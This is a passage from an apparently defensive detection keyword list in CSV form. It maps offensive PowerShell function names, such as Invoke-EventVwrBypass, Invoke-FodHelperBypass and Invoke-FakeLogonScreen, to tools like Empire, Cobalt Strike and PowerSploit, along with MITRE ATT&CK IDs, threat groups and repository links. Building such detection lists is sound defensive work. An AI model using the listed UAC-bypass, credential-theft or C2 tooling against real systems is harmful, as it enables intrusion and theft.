T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-EnumerateLocalAdmin*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-EnumerateLocalAdmin*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,powerview.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-EnumerateLocalAdmin*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-EnvBypass*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-BypassUACTokenManipulation.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-EnvBypass.*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*Invoke-EnvBypass.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1125,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-EssessAgress*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*invoke-eternalblue*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Invoke-EventHunter*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*invoke-eventhunter*,offensive_tool_keyword,pywerview,A partial Python rewriting of PowerSploit PowerView,T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482,TA0007 - TA0009,N/A,N/A,Reconnaissance,https://github.com/the-useless-one/pywerview,1,1,N/A,N/A,8,738,102,2023-10-02T14:57:20Z,2016-07-06T13:25:09Z -*Invoke-EventViewer *.exe*,offensive_tool_keyword,EventViewer-UACBypass,RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass,T1078.004 - T1216 - T1068,TA0004 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CsEnox/EventViewer-UACBypass,1,1,N/A,10,2,108,21,2022-04-29T09:42:37Z,2022-04-27T12:56:59Z -*Invoke-EventViewer.ps1*,offensive_tool_keyword,EventViewer-UACBypass,RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass,T1078.004 - T1216 - T1068,TA0004 - TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/CsEnox/EventViewer-UACBypass,1,1,N/A,10,2,108,21,2022-04-29T09:42:37Z,2022-04-27T12:56:59Z -*Invoke-EventVwrBypass*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*Invoke-EventVwrBypass*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-EventVwrBypass.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ExecuteMSBuild*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-ExecuteMSBuild.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ExecuteMSBuild.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1090,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ExploitableLeakedHandlesCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z -*Invoke-Eyewitness*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-FakeLogonScreen*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Farmer*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*invokefilefinder*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-FileFinder*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z -*Invoke-FileFinder*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Invoke-FodHelperBypass*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-FodHelperBypass.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-FodHelperBypass*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1127,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*Invoke-ForgeUserAgent*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*Invoke-Get-RBCD-Threaded*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Get-RBCD-Threaded*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-GlobalMailSearch*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-GlobalMailSearch*,offensive_tool_keyword,MailSniper,To search all mailboxes in a domain,T1595 T1114 T1590 T1591 T1114,N/A,N/A,N/A,Reconnaissance,https://github.com/dafthack/MailSniper,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-GlobalO365MailSearch*,offensive_tool_keyword,MailSniper,MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.,T1114 - T1134.002,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1,1,1,N/A,N/A,10,2625,554,2022-10-20T08:13:33Z,2016-09-08T00:36:51Z -*Invoke-GoFetch*,offensive_tool_keyword,GoFetch,GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.,T1078 - T1078.003 - T1021 - T1021.006 - T1076.001,TA0005 - TA0001 - TA0003,N/A,N/A,Exploitation tools - AD Enumeration,https://github.com/GoFetchAD/GoFetch,1,1,N/A,10,7,615,126,2017-06-20T14:15:10Z,2017-04-11T10:45:23Z -*Invoke-Gopher*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-GPPPasswordCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-GPPPasswordCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for 